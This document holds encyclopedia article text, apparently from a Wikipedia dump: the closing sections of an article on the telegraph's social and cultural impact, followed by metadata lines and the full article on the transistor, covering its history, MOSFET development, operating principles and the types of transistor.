Telegraph lines continued to be an important means of distributing news feeds from news agencies by teleprinter machine until the rise of the internet in the 1990s. For Western Union, one service remained highly profitable—the wire transfer of money. This service kept Western Union in business long after the telegraph had ceased to be important. In the modern era, the telegraph that began in 1837 has been gradually replaced by digital data transmission based on computer information systems. Social implications Optical telegraph lines were installed by governments, often for a military purpose, and reserved for official use only. In many countries, this situation continued after the introduction of the electric telegraph. Starting in Germany and the UK, electric telegraph lines were installed by railway companies. Railway use quickly led to private telegraph companies in the UK and the US offering telegraph services to the public over lines run along the railways. The availability of this new form of communication brought on widespread social and economic changes. The electric telegraph freed communication from the time constraints of postal mail and revolutionized the global economy and society. By the end of the 19th century, the telegraph was becoming an increasingly common medium of communication for ordinary people. The telegraph isolated the message (information) from the physical movement of objects or the process. There was some fear of the new technology. According to author Allan J. Kimmel, some people "feared that the telegraph would erode the quality of public discourse through the transmission of irrelevant, context-free information." Henry David Thoreau wrote of the transatlantic cable: "...perchance the first news that will leak through into the broad flapping American ear will be that Princess Adelaide has the whooping cough." Kimmel says these fears anticipate many of the characteristics of the modern internet age. Initially, the telegraph was expensive, but it had an enormous effect on three industries: finance, newspapers, and railways. Telegraphy facilitated the growth of organizations "in the railroads, consolidated financial and commodity markets, and reduced information costs within and between firms". In the US, there were 200 to 300 stock exchanges before the telegraph, but most of these were unnecessary and unprofitable once the telegraph made financial transactions at a distance easy and drove down transaction costs. This immense growth in the business sectors influenced society to embrace the use of telegrams once the cost had fallen. Worldwide telegraphy changed the gathering of information for news reporting. Journalists were using the telegraph for war reporting as early as 1846, when the Mexican–American War broke out. News agencies were formed, such as the Associated Press, for the purpose of reporting news by telegraph. Messages and information would now travel far and wide, and the telegraph demanded a language "stripped of the local, the regional, and colloquial", to better facilitate a worldwide media language. Media language had to be standardized, which led to the gradual disappearance of different forms of speech and styles of journalism and storytelling. The spread of the railways created a need for an accurate standard time to replace local standards based on local noon. The means of achieving this synchronisation was the telegraph. This emphasis on precise time has led to major societal changes such as the concept of the time value of money.
During the telegraph era there was widespread employment of women in telegraphy. The shortage of men to work as telegraph operators in the American Civil War opened up the opportunity for women of a well-paid skilled job. In the UK, there was widespread employment of women as telegraph operators even earlier – from the 1850s by all the major companies. The attraction of women for the telegraph companies was that they could pay them less than men. Nevertheless, the jobs were popular with women for the same reason as in the US; most other work available to women was very poorly paid. The economic impact of the telegraph was not much studied by economic historians until parallels started to be drawn with the rise of the internet. In fact, the electric telegraph was as important as the invention of printing in this respect. According to economist Ronnie J. Phillips, the reason for this may be that institutional economists paid more attention to advances that required greater capital investment. The investment required to build railways, for instance, is orders of magnitude greater than that for the telegraph. Popular culture The optical telegraph was quickly forgotten once it went out of service. While it was in operation, it was very familiar to the public across Europe. Examples appear in many paintings of the period. Victor Hugo devoted a poem to it, and at least one contemporary collection of poems was dedicated to the telegraph. In novels, the telegraph is a major component in Lucien Leuwen by Stendhal, and it features in The Count of Monte Cristo by Alexandre Dumas. Joseph Chudy's 1796 opera was written to publicise Chudy's telegraph (a binary code with five lamps) when it became clear that Chappe's design was being taken up. Rudyard Kipling wrote a poem in praise of submarine telegraph cables: "And a new Word runs between: whispering, 'Let us be one!'" Kipling's poem represented a widespread idea in the late nineteenth century that international telegraphy (and new technology in general) would bring peace and mutual understanding to the world. When a submarine telegraph cable first connected America and Britain, the New York Post greeted it in the same spirit. Newspaper names Numerous newspapers and news outlets in various countries, such as The Daily Telegraph in Britain, The Telegraph in India, De Telegraaf in the Netherlands, and the Jewish Telegraphic Agency in the US, were given names which include the word "telegraph" due to their having received news by means of electric telegraphy. Some of these names are retained even though different means of news acquisition are now used.
Technology
Media and communication
null
30011
https://en.wikipedia.org/wiki/Transistor
Transistor
A transistor is a semiconductor device used to amplify or switch electrical signals and power. It is one of the basic building blocks of modern electronics. It is composed of semiconductor material, usually with at least three terminals for connection to an electronic circuit. A voltage or current applied to one pair of the transistor's terminals controls the current through another pair of terminals. Because the controlled (output) power can be higher than the controlling (input) power, a transistor can amplify a signal. Some transistors are packaged individually, but many more in miniature form are found embedded in integrated circuits. Because transistors are the key active components in practically all modern electronics, many people consider them one of the 20th century's greatest inventions. Physicist Julius Edgar Lilienfeld proposed the concept of a field-effect transistor (FET) in 1925, but it was not possible to construct a working device at that time. The first working device was a point-contact transistor invented in 1947 by physicists John Bardeen, Walter Brattain, and William Shockley at Bell Labs, who shared the 1956 Nobel Prize in Physics for their achievement. The most widely used type of transistor, the metal–oxide–semiconductor field-effect transistor (MOSFET), was invented at Bell Labs between 1955 and 1960. Transistors revolutionized the field of electronics and paved the way for smaller and cheaper radios, calculators, computers, and other electronic devices. Most transistors are made from very pure silicon, and some from germanium, but certain other semiconductor materials are sometimes used. A transistor may have only one kind of charge carrier, as in a field-effect transistor, or two kinds, as in a bipolar junction transistor. Compared with the vacuum tube, transistors are generally smaller and require less power to operate. Certain vacuum tubes, such as traveling-wave tubes and gyrotrons, have advantages over transistors at very high operating frequencies or high operating voltages. Many types of transistors are made to standardized specifications by multiple manufacturers. History The thermionic triode, a vacuum tube invented in 1907, enabled amplified radio technology and long-distance telephony. The triode, however, was a fragile device that consumed a substantial amount of power. In 1909, physicist William Eccles discovered the crystal diode oscillator. Physicist Julius Edgar Lilienfeld filed a patent for a field-effect transistor (FET) in Canada in 1925, intended as a solid-state replacement for the triode. He filed identical patents in the United States in 1926 and 1928. However, he did not publish any research articles about his devices, nor did his patents cite any specific examples of a working prototype. Because the production of high-quality semiconductor materials was still decades away, Lilienfeld's solid-state amplifier ideas would not have found practical use in the 1920s and 1930s, even if such a device had been built. In 1934, inventor Oskar Heil patented a similar device in Europe. Bipolar transistors From November 17 to December 23, 1947, John Bardeen and Walter Brattain at AT&T's Bell Labs in Murray Hill, New Jersey, performed experiments and observed that when two gold point contacts were applied to a crystal of germanium, a signal was produced with the output power greater than the input.
Solid State Physics Group leader William Shockley saw the potential in this, and over the next few months worked to greatly expand the knowledge of semiconductors. The term transistor was coined by John R. Pierce as a contraction of the term transresistance. According to Lillian Hoddeson and Vicki Daitch, Shockley proposed that Bell Labs' first patent for a transistor should be based on the field effect and that he be named as the inventor. Having unearthed Lilienfeld's patents that went into obscurity years earlier, lawyers at Bell Labs advised against Shockley's proposal because the idea of a field-effect transistor that used an electric field as a "grid" was not new. Instead, what Bardeen, Brattain, and Shockley invented in 1947 was the first point-contact transistor. To acknowledge this accomplishment, Shockley, Bardeen and Brattain jointly received the 1956 Nobel Prize in Physics "for their researches on semiconductors and their discovery of the transistor effect". Shockley's team initially attempted to build a field-effect transistor (FET) by trying to modulate the conductivity of a semiconductor, but was unsuccessful, mainly due to problems with the surface states, the dangling bonds, and the germanium and copper compound materials. Trying to understand the mysterious reasons behind this failure led them instead to invent the bipolar point-contact and junction transistors. In 1948, the point-contact transistor was independently invented by physicists Herbert Mataré and Heinrich Welker while working at the Compagnie des Freins et Signaux Westinghouse, a Westinghouse subsidiary in Paris. Mataré had previous experience in developing crystal rectifiers from silicon and germanium in the German radar effort during World War II. With this knowledge, he began researching the phenomenon of "interference" in 1947. By June 1948, witnessing currents flowing through point-contacts, he produced consistent results using samples of germanium produced by Welker, similar to what Bardeen and Brattain had accomplished earlier in December 1947. Realizing that Bell Labs' scientists had already invented the transistor, the company rushed to get its "transistron" into production for amplified use in France's telephone network, and filed its first transistor patent application on August 13, 1948. The first bipolar junction transistors were invented by Bell Labs' William Shockley, who applied for a patent (2,569,347) on June 26, 1948. On April 12, 1950, Bell Labs chemists Gordon Teal and Morgan Sparks successfully produced a working bipolar NPN junction amplifying germanium transistor. Bell announced the discovery of this new "sandwich" transistor in a press release on July 4, 1951. The first high-frequency transistor was the surface-barrier germanium transistor developed by Philco in 1953, capable of operating at much higher frequencies than earlier transistors. They were made by etching depressions into an n-type germanium base from both sides with jets of indium(III) sulfate until it was a few ten-thousandths of an inch thick. Indium electroplated into the depressions formed the collector and emitter. AT&T first used transistors in telecommunications equipment in the No. 4A Toll Crossbar Switching System in 1953, for selecting trunk circuits from routing information encoded on translator cards. Its predecessor, the Western Electric No. 3A phototransistor, read the mechanical encoding from punched metal cards.
The first prototype pocket transistor radio was shown by INTERMETALL, a company founded by Herbert Mataré in 1952, at the Internationale Funkausstellung Düsseldorf, held from August 29 to September 6, 1953. The first production-model pocket transistor radio was the Regency TR-1, released in October 1954. Produced as a joint venture between the Regency Division of Industrial Development Engineering Associates (I.D.E.A.) and Texas Instruments of Dallas, Texas, the TR-1 was manufactured in Indianapolis, Indiana. It was a near pocket-sized radio with four transistors and one germanium diode. The industrial design was outsourced to the Chicago firm of Painter, Teague and Petertil. It was initially released in one of six colours: black, ivory, mandarin red, cloud grey, mahogany and olive green. Other colours soon followed. The first production all-transistor car radio was developed by the Chrysler and Philco corporations and was announced in the April 28, 1955, edition of The Wall Street Journal. Chrysler made the Mopar model 914HR available as an option starting in fall 1955 for its new line of 1956 Chrysler and Imperial cars, which reached dealership showrooms on October 21, 1955. The Sony TR-63, released in 1957, was the first mass-produced transistor radio, leading to the widespread adoption of transistor radios. Seven million TR-63s were sold worldwide by the mid-1960s. Sony's success with transistor radios led to transistors replacing vacuum tubes as the dominant electronic technology in the late 1950s. The first working silicon transistor was developed at Bell Labs on January 26, 1954, by Morris Tanenbaum. The first commercial production silicon transistor was announced by Texas Instruments in May 1954. This was the work of Gordon Teal, an expert in growing crystals of high purity, who had previously worked at Bell Labs. Field-effect transistors The basic principle of the field-effect transistor (FET) was first proposed by physicist Julius Edgar Lilienfeld when he filed a patent for a device similar to a MESFET in 1926, and for an insulated-gate field-effect transistor in 1928. The FET concept was later also theorized by engineer Oskar Heil in the 1930s and by William Shockley in the 1940s. In 1945, a JFET was patented by Heinrich Welker. Following Shockley's theoretical treatment of the JFET in 1952, a working practical JFET was made in 1953 by George C. Dacey and Ian M. Ross. In 1948, Bardeen and Brattain patented the progenitor of the MOSFET at Bell Labs, an insulated-gate FET (IGFET) with an inversion layer. Bardeen's patent, and the concept of an inversion layer, form the basis of CMOS and DRAM technology today. In the early years of the semiconductor industry, companies focused on the junction transistor, a relatively bulky device that was difficult to mass-produce, limiting it to several specialized applications. Field-effect transistors (FETs) were theorized as potential alternatives, but researchers could not get them to work properly, largely due to the surface state barrier that prevented the external electric field from penetrating the material. MOSFET (MOS transistor) In 1955, Carl Frosch and Lincoln Derick accidentally grew a layer of silicon dioxide over the silicon wafer, for which they observed surface passivation effects. By 1957, Frosch and Derick, using masking and predeposition, were able to manufacture silicon dioxide field-effect transistors: the first planar transistors, in which drain and source were adjacent at the same surface.
They showed that silicon dioxide insulated and protected silicon wafers and prevented dopants from diffusing into the wafer. After this, J.R. Ligenza and W.G. Spitzer studied the mechanism of thermally grown oxides, fabricated a high-quality Si/SiO2 stack and published their results in 1960. Following this research, Mohamed Atalla and Dawon Kahng proposed a silicon MOS transistor in 1959 and successfully demonstrated a working MOS device with their Bell Labs team in 1960. Their team included E. E. LaBate and E. I. Povilonis, who fabricated the device; M. O. Thurston, L. A. D'Asaro, and J. R. Ligenza, who developed the diffusion processes; and H. K. Gummel and R. Lindner, who characterized the device. With its high scalability, much lower power consumption, and higher density than bipolar junction transistors, the MOSFET made it possible to build high-density integrated circuits, allowing the integration of more than 10,000 transistors in a single IC. Bardeen and Brattain's 1948 inversion layer concept forms the basis of CMOS technology today. CMOS (complementary MOS) was invented by Chih-Tang Sah and Frank Wanlass at Fairchild Semiconductor in 1963. The first report of a floating-gate MOSFET was made by Dawon Kahng and Simon Sze in 1967. In 1967, Bell Labs researchers Robert Kerwin, Donald Klein and John Sarace developed the self-aligned gate (silicon-gate) MOS transistor, which Fairchild Semiconductor researchers Federico Faggin and Tom Klein used to develop the first silicon-gate MOS integrated circuit. A double-gate MOSFET was first demonstrated in 1984 by Electrotechnical Laboratory researchers Toshihiro Sekigawa and Yutaka Hayashi. The FinFET (fin field-effect transistor), a type of 3D non-planar multi-gate MOSFET, originated from the research of Digh Hisamoto and his team at Hitachi Central Research Laboratory in 1989. Importance Because transistors are the key active components in practically all modern electronics, many people consider them one of the 20th century's greatest inventions. The invention of the first transistor at Bell Labs was named an IEEE Milestone in 2009. Other Milestones include the inventions of the junction transistor in 1948 and the MOSFET in 1959. The MOSFET is by far the most widely used transistor, in applications ranging from computers and electronics to communications technology such as smartphones. It has been considered the most important transistor, possibly the most important invention in electronics, and the device that enabled modern electronics. It has been the basis of modern digital electronics since the late 20th century, paving the way for the digital age. The US Patent and Trademark Office calls it a "groundbreaking invention that transformed life and culture around the world". Its ability to be mass-produced by a highly automated process (semiconductor device fabrication), from relatively basic materials, allows astonishingly low per-transistor costs. MOSFETs are the most numerously produced artificial objects in history, with more than 13 sextillion manufactured by 2018. Although several companies each produce over a billion individually packaged (known as discrete) MOS transistors every year, the vast majority are produced in integrated circuits (also known as ICs, microchips, or simply chips), along with diodes, resistors, capacitors and other electronic components, to produce complete electronic circuits.
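The complementary pairing that gives CMOS its name is what makes dense logic practical: for any steady input, one transistor of the pair conducts and the other blocks, so no continuous current path exists from supply to ground. A toy model of ours, not from the source, with the device behaviour reduced to booleans:

```python
# Hedged sketch: a CMOS inverter as complementary switches. The PMOS
# device conducts when its gate is low, the NMOS when its gate is high,
# so exactly one of them drives the output at any time.
def cmos_inverter(a: int) -> int:
    pmos_on = (a == 0)  # pulls the output up to the supply rail
    nmos_on = (a == 1)  # pulls the output down to ground
    return 1 if pmos_on and not nmos_on else 0

for a in (0, 1):
    print(a, "->", cmos_inverter(a))  # 0 -> 1, 1 -> 0
```

Gates such as NAND add series and parallel transistor networks to the same pattern, which is how the transistor counts per gate mentioned next arise.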
A logic gate consists of up to about 20 transistors, whereas an advanced microprocessor, as of 2023, may contain as many as 134 billion transistors (and for exceptional chips, 2.6 trillion transistors, as of 2020). Transistors are often organized into logic gates in microprocessors to perform computation. The transistor's low cost, flexibility and reliability have made it ubiquitous. Transistorized mechatronic circuits have replaced electromechanical devices in controlling appliances and machinery. It is often easier and cheaper to use a standard microcontroller and write a computer program to carry out a control function than to design an equivalent mechanical system. Simplified operation A transistor can use a small signal applied between one pair of its terminals to control a much larger signal at another pair of terminals, a property called gain. It can produce a stronger output signal, a voltage or current, proportional to a weaker input signal, acting as an amplifier. It can also be used as an electrically controlled switch, where the amount of current is determined by other circuit elements. There are two types of transistors, with slight differences in how they are used: A bipolar junction transistor (BJT) has terminals labeled base, collector and emitter. A small current at the base terminal, flowing between the base and the emitter, can control or switch a much larger current between the collector and emitter. A field-effect transistor (FET) has terminals labeled gate, source and drain. A voltage at the gate can control a current between source and drain. The top image in this section represents a typical bipolar transistor in a circuit. A charge flows between emitter and collector terminals depending on the current in the base. Because the base and emitter connections behave like a semiconductor diode, a voltage drop develops between them. The amount of this drop, determined by the transistor's material, is referred to as VBE (base–emitter voltage). Transistor as a switch Transistors are commonly used in digital circuits as electronic switches which can be either in an "on" or "off" state, both for high-power applications such as switched-mode power supplies and for low-power applications such as logic gates. Important parameters for this application include the current switched, the voltage handled, and the switching speed, characterized by the rise and fall times. In a switching circuit, the goal is to simulate, as nearly as possible, the ideal switch having the properties of an open circuit when off, a short circuit when on, and an instantaneous transition between the two states. Parameters are chosen such that the "off" output is limited to leakage currents too small to affect connected circuitry, the resistance of the transistor in the "on" state is too small to affect circuitry, and the transition between the two states is fast enough not to have a detrimental effect. In a grounded-emitter transistor circuit, such as the light-switch circuit shown, as the base voltage rises, the emitter and collector currents rise exponentially. The collector voltage drops because of reduced resistance from the collector to the emitter. If the voltage difference between the collector and emitter were zero (or near zero), the collector current would be limited only by the load resistance (light bulb) and the supply voltage. This is called saturation because the current is flowing from collector to emitter freely. When saturated, the switch is said to be on.
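The saturation arithmetic can be made concrete. Below is a minimal sketch of sizing a base resistor for a saturated switch; the component values and the overdrive factor are hypothetical illustrations of ours, and the simple formula uses the base-emitter drop, as is usual in first-pass designs:

```python
# Hedged sketch: choosing a base resistor so a BJT switch saturates.
V_supply = 5.0   # supply voltage, volts (hypothetical)
V_be = 0.7       # typical silicon base-emitter drop, volts
I_c = 0.1        # collector (load) current, amps - e.g. a small lamp
beta = 100       # current gain (varies widely between devices)
overdrive = 5    # extra base drive to guarantee saturation

I_b = overdrive * I_c / beta   # required base current
R_b = (V_supply - V_be) / I_b  # Ohm's law across the base resistor
print(f"I_b = {I_b * 1e3:.0f} mA, R_b = {R_b:.0f} ohms")
# I_b = 5 mA, R_b = 860 ohms -> the nearest standard value would be used
```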
Transistor as an amplifier The common-emitter amplifier is designed so that a small change in voltage (Vin) changes the small current through the base of the transistor; the transistor's current amplification, combined with the properties of the circuit, means that small swings in Vin produce large changes in Vout. Various configurations of single transistor amplifiers are possible, with some providing current gain, some voltage gain, and some both. From mobile phones to televisions, vast numbers of products include amplifiers for sound reproduction, radio transmission, and signal processing. The first discrete-transistor audio amplifiers barely supplied a few hundred milliwatts, but power and audio fidelity gradually increased as better transistors became available and amplifier architecture evolved. Modern transistor audio amplifiers of up to a few hundred watts are common and relatively inexpensive. Comparison with vacuum tubes Before transistors were developed, vacuum (electron) tubes (or in the UK "thermionic valves" or just "valves") were the main active components in electronic equipment. Advantages The key advantages that have allowed transistors to replace vacuum tubes in most applications are: No cathode heater (which produces the characteristic orange glow of tubes), reducing power consumption, eliminating delay as tube heaters warm up, and providing immunity from cathode poisoning and depletion. Very small size and weight, reducing equipment size. Large numbers of extremely small transistors can be manufactured as a single integrated circuit. Low operating voltages compatible with batteries of only a few cells. Circuits with greater energy efficiency are usually possible. For low-power applications (for example, voltage amplification) in particular, energy consumption can be very much less than for tubes. Complementary devices available, providing design flexibility including complementary-symmetry circuits, not possible with vacuum tubes. Very low sensitivity to mechanical shock and vibration, providing physical ruggedness and virtually eliminating shock-induced spurious signals (for example, microphonics in audio applications). Not susceptible to breakage of a glass envelope, leakage, outgassing, and other physical damage.
Limitations Transistors may have the following limitations: They lack the higher electron mobility afforded by the vacuum of vacuum tubes, which is desirable for high-power, high-frequency operation such as that used in some over-the-air television transmitters and in travelling-wave tubes used as amplifiers in some satellites. Transistors and other solid-state devices are susceptible to damage from very brief electrical and thermal events, including electrostatic discharge in handling; vacuum tubes are electrically much more rugged. They are sensitive to radiation and cosmic rays (special radiation-hardened chips are used for spacecraft devices). In audio applications, transistors lack the low-order harmonic distortion, the so-called tube sound, which is characteristic of vacuum tubes and preferred by some. Types Classification [Symbol table: BJT types PNP and NPN; JFET types P-channel and N-channel; MOSFET enhancement and depletion types, each P-channel and N-channel.] Transistors are categorized by Structure: MOSFET (IGFET), BJT, JFET, insulated-gate bipolar transistor (IGBT), other types. Semiconductor material (dopants): the metalloids germanium (first used in 1947) and silicon (first used in 1954)—in amorphous, polycrystalline and monocrystalline form; the compounds gallium arsenide (1966) and silicon carbide (1997); the alloy silicon–germanium (1989); and the allotrope of carbon, graphene (research ongoing since 2004), etc. (see Semiconductor material). Electrical polarity (positive and negative): NPN, PNP (BJTs); N-channel, P-channel (FETs). Maximum power rating: low, medium, high. Maximum operating frequency: low, medium, high, radio (RF), microwave frequency (the maximum effective frequency of a transistor in a common-emitter or common-source circuit is denoted by the term fT, an abbreviation for transition frequency—the frequency at which the transistor yields unity current gain). Application: switch, general purpose, audio, high voltage, super-beta, matched pair. Physical packaging: through-hole metal, through-hole plastic, surface mount, ball grid array, power modules (see Packaging). Amplification factor: hFE (transistor beta) or gm (transconductance). Working temperature: extreme-temperature transistors and traditional-temperature transistors. Extreme-temperature transistors include high-temperature and low-temperature types. High-temperature transistors that remain thermally stable at elevated temperatures can be developed by a general strategy of blending interpenetrating semi-crystalline conjugated polymers and high glass-transition-temperature insulating polymers. Hence, a particular transistor may be described as a silicon, surface-mount, BJT, NPN, low-power, high-frequency switch. Mnemonics A convenient mnemonic for remembering the type of transistor (represented by an electrical symbol) involves the direction of the arrow. For the BJT, on an n–p–n transistor symbol, the arrow will "Not Point iN". On a p–n–p transistor symbol, the arrow "Points iN Proudly". However, this does not apply to MOSFET-based transistor symbols, as the arrow is typically reversed (i.e. the arrow for the n–p–n points inward). Field-effect transistor (FET) The field-effect transistor, sometimes called a unipolar transistor, uses either electrons (in an n-channel FET) or holes (in a p-channel FET) for conduction.
The four terminals of the FET are named source, gate, drain, and body (substrate). On most FETs, the body is connected to the source inside the package, and this will be assumed for the following description. In a FET, the drain-to-source current flows via a conducting channel that connects the source region to the drain region. The conductivity is varied by the electric field that is produced when a voltage is applied between the gate and source terminals; hence the current flowing between the drain and source is controlled by the voltage applied between the gate and source. As the gate–source voltage (VGS) is increased, the drain–source current (IDS) increases exponentially for VGS below threshold, and then at a roughly quadratic rate (IDS ∝ (VGS − VT)², where VT is the threshold voltage at which drain current begins) in the "space-charge-limited" region above threshold. A quadratic behavior is not observed in modern devices, for example, at the 65 nm technology node. For low noise at narrow bandwidth, the higher input resistance of the FET is advantageous. FETs are divided into two families: junction FET (JFET) and insulated gate FET (IGFET). The IGFET is more commonly known as a metal–oxide–semiconductor FET (MOSFET), reflecting its original construction from layers of metal (the gate), oxide (the insulation), and semiconductor. Unlike IGFETs, the JFET gate forms a p–n diode with the channel which lies between the source and drain. Functionally, this makes the n-channel JFET the solid-state equivalent of the vacuum tube triode which, similarly, forms a diode between its grid and cathode. Also, both devices operate in the depletion mode, they both have a high input impedance, and they both conduct current under the control of an input voltage. Metal–semiconductor FETs (MESFETs) are JFETs in which the reverse-biased p–n junction is replaced by a metal–semiconductor junction. These, and the HEMTs (high-electron-mobility transistors, or HFETs), in which a two-dimensional electron gas with very high carrier mobility is used for charge transport, are especially suitable for use at very high frequencies (several GHz). FETs are further divided into depletion-mode and enhancement-mode types, depending on whether the channel is turned on or off with zero gate-to-source voltage. For enhancement mode, the channel is off at zero bias, and a gate potential can "enhance" the conduction. For depletion mode, the channel is on at zero bias, and a gate potential (of the opposite polarity) can "deplete" the channel, reducing conduction. For either mode, a more positive gate voltage corresponds to a higher current for n-channel devices and a lower current for p-channel devices. Nearly all JFETs are depletion-mode because the diode junctions would forward bias and conduct if they were enhancement-mode devices, while most IGFETs are enhancement-mode types.
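The current-voltage behavior described above (exponential conduction below threshold, roughly quadratic above it) can be sketched with an idealized long-channel model. The parameter values below are illustrative textbook assumptions, not data for any particular device:

```python
import math

def drain_current(v_gs, v_ds, v_t=0.7, k=2e-3, i_0=1e-9, n=1.5, v_therm=0.026):
    """Idealized long-channel n-MOSFET model (piecewise, for illustration only).

    v_t: threshold voltage (V); k: transconductance parameter (A/V^2);
    i_0 and n: subthreshold scale and slope factor; v_therm: kT/q at room temperature.
    """
    v_ov = v_gs - v_t                     # overdrive voltage
    if v_ov <= 0:
        # Subthreshold: current rises exponentially with gate voltage.
        return i_0 * math.exp(v_ov / (n * v_therm))
    if v_ds < v_ov:
        # Triode region: the channel behaves as a gate-controlled resistor.
        return k * (v_ov * v_ds - v_ds ** 2 / 2)
    # Saturation: current grows roughly as the square of the overdrive.
    return 0.5 * k * v_ov ** 2

for v_gs in (0.5, 1.0, 2.0, 3.0):
    print(f"V_GS = {v_gs:.1f} V -> I_D = {drain_current(v_gs, v_ds=3.0):.2e} A")
```

Raising VGS from 1 V to 2 V here increases the saturated drain current from 90 microamperes to about 1.7 milliamperes, reflecting the quadratic dependence on overdrive; as noted above, real short-channel devices deviate from this idealized law.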
Metal–oxide–semiconductor FET (MOSFET) The metal–oxide–semiconductor field-effect transistor (MOSFET, MOS-FET, or MOS FET), also known as the metal–oxide–silicon transistor (MOS transistor, or MOS), is a type of field-effect transistor that is fabricated by the controlled oxidation of a semiconductor, typically silicon. It has an insulated gate, whose voltage determines the conductivity of the device. This ability to change conductivity with the amount of applied voltage can be used for amplifying or switching electronic signals. The MOSFET is by far the most common transistor, and the basic building block of most modern electronics. The MOSFET accounts for 99.9% of all transistors in the world. Bipolar junction transistor (BJT) Bipolar transistors are so named because they conduct by using both majority and minority carriers. The bipolar junction transistor, the first type of transistor to be mass-produced, is a combination of two junction diodes and is formed of either a thin layer of p-type semiconductor sandwiched between two n-type semiconductors (an n–p–n transistor), or a thin layer of n-type semiconductor sandwiched between two p-type semiconductors (a p–n–p transistor). This construction produces two p–n junctions: a base-emitter junction and a base-collector junction, separated by a thin region of semiconductor known as the base region. (Two junction diodes wired together without sharing an intervening semiconducting region will not make a transistor.) BJTs have three terminals, corresponding to the three layers of semiconductor—an emitter, a base, and a collector. They are useful in amplifiers because the currents at the emitter and collector are controllable by a relatively small base current. In an n–p–n transistor operating in the active region, the emitter-base junction is forward-biased (electrons and holes recombine at the junction), the base-collector junction is reverse-biased (electrons and holes are formed at, and move away from, the junction), and electrons are injected into the base region. Because the base is narrow, most of these electrons will diffuse into the reverse-biased base-collector junction and be swept into the collector; perhaps one-hundredth of the electrons will recombine in the base, which is the dominant mechanism in the base current. Also, because the base is lightly doped (in comparison to the emitter and collector regions), recombination rates are low, permitting more carriers to diffuse across the base region. By controlling the number of electrons that can leave the base, the number of electrons entering the collector can be controlled. Collector current is approximately β (common-emitter current gain) times the base current. It is typically greater than 100 for small-signal transistors but can be smaller in transistors designed for high-power applications. Unlike the field-effect transistor (see below), the BJT is a low-input-impedance device. Also, as the base-emitter voltage (VBE) is increased, the base-emitter current and hence the collector-emitter current (ICE) increase exponentially according to the Shockley diode model and the Ebers–Moll model. Because of this exponential relationship, the BJT has a higher transconductance than the FET. Bipolar transistors can be made to conduct by exposure to light because the absorption of photons in the base region generates a photocurrent that acts as a base current; the collector current is approximately β times the photocurrent. Devices designed for this purpose have a transparent window in the package and are called phototransistors.
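A brief numerical sketch of the exponential base-emitter relationship and the current gain β described above; the saturation current, thermal voltage, and gain are assumed textbook values rather than measurements of a real part:

```python
import math

I_S = 1e-14   # saturation current, amperes (assumed small-signal value)
V_T = 0.026   # thermal voltage kT/q at room temperature, volts
BETA = 100.0  # common-emitter current gain (assumed)

def collector_current(v_be):
    """Shockley-type law: each ~60 mV added to V_BE multiplies I_C by about ten."""
    return I_S * math.exp(v_be / V_T)

for v_be in (0.60, 0.66, 0.72):
    i_c = collector_current(v_be)
    i_b = i_c / BETA    # base current implied by the current gain
    g_m = i_c / V_T     # transconductance grows in proportion to I_C
    print(f"V_BE = {v_be:.2f} V: I_C = {i_c * 1e3:.3f} mA, "
          f"I_B = {i_b * 1e6:.1f} uA, g_m = {g_m * 1e3:.1f} mS")
```

The steep exponential is why small base-voltage swings produce large collector-current changes, and why the BJT's transconductance exceeds that of a FET carrying comparable current.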
Usage of MOSFETs and BJTs The MOSFET is by far the most widely used transistor for both digital and analog circuits, accounting for 99.9% of all transistors in the world. The bipolar junction transistor (BJT) was previously the most commonly used transistor, during the 1950s and 1960s. Even after MOSFETs became widely available in the 1970s, the BJT remained the transistor of choice for many analog circuits such as amplifiers because of its greater linearity, up until MOSFET devices (such as power MOSFETs, LDMOS and RF CMOS) replaced them for most power electronic applications in the 1980s. In integrated circuits, the desirable properties of MOSFETs allowed them to capture nearly all market share for digital circuits in the 1970s. Discrete MOSFETs (typically power MOSFETs) can be applied in transistor applications, including analog circuits, voltage regulators, amplifiers, power transmitters, and motor drivers. Other transistor types Field-effect transistor (FET): Metal–oxide–semiconductor field-effect transistor (MOSFET), where the gate is insulated by a shallow layer of insulator p-type MOS (PMOS) n-type MOS (NMOS) complementary MOS (CMOS) RF CMOS, for radio-frequency amplification and reception Multi-gate field-effect transistor (MuGFET) Fin field-effect transistor (FinFET), where the source/drain region forms fins on the silicon surface GAAFET, similar to the FinFET but with nanowires used instead of fins; the nanowires are stacked vertically and are surrounded on four sides by the gate MBCFET, a variant of the GAAFET that uses horizontal nanosheets instead of nanowires, made by Samsung; also known as RibbonFET (made by Intel) and as the horizontal nanosheet transistor Thin-film transistor (TFT), used in LCD and OLED displays; types include amorphous silicon, LTPS, LTPO and IGZO transistors Floating-gate MOSFET (FGMOS), for non-volatile storage Power MOSFET, for power electronics lateral diffused MOS (LDMOS) Carbon nanotube field-effect transistor (CNFET, CNTFET), where the channel material is replaced by a carbon nanotube Ferroelectric field-effect transistor (Fe FET), which uses ferroelectric materials Junction gate field-effect transistor (JFET), where the gate is insulated by a reverse-biased p–n junction Metal–semiconductor field-effect transistor (MESFET), similar to the JFET but with a Schottky junction instead of a p–n junction High-electron-mobility transistor (HEMT): GaN (gallium nitride), SiC (silicon carbide), Ga2O3 (gallium oxide), GaAs (gallium arsenide) transistors, MOSFETs, etc. Negative-capacitance FET (NC-FET) Inverted-T field-effect transistor (ITFET) Fast-reverse epitaxial diode field-effect transistor (FREDFET) Organic field-effect transistor (OFET), in which the semiconductor is an organic compound Ballistic transistor FETs used to sense the environment: Ion-sensitive field-effect transistor (ISFET), to measure ion concentrations in solution Electrolyte–oxide–semiconductor field-effect transistor (EOSFET), neurochip Deoxyribonucleic acid field-effect transistor (DNAFET) Field-effect transistor-based biosensor (Bio-FET) Bipolar junction transistor (BJT): Heterojunction bipolar transistor, up to several hundred GHz, common in modern ultrafast and RF circuits Schottky transistor Avalanche transistor Darlington transistors, two BJTs connected together to provide a high current gain equal to the product of the current gains of the two transistors Insulated-gate bipolar transistors (IGBTs), which use a medium-power IGFET, similarly connected to a power BJT, to give a high input impedance. Power diodes are often connected between certain terminals depending on specific use. IGBTs are particularly suitable for heavy-duty industrial applications.
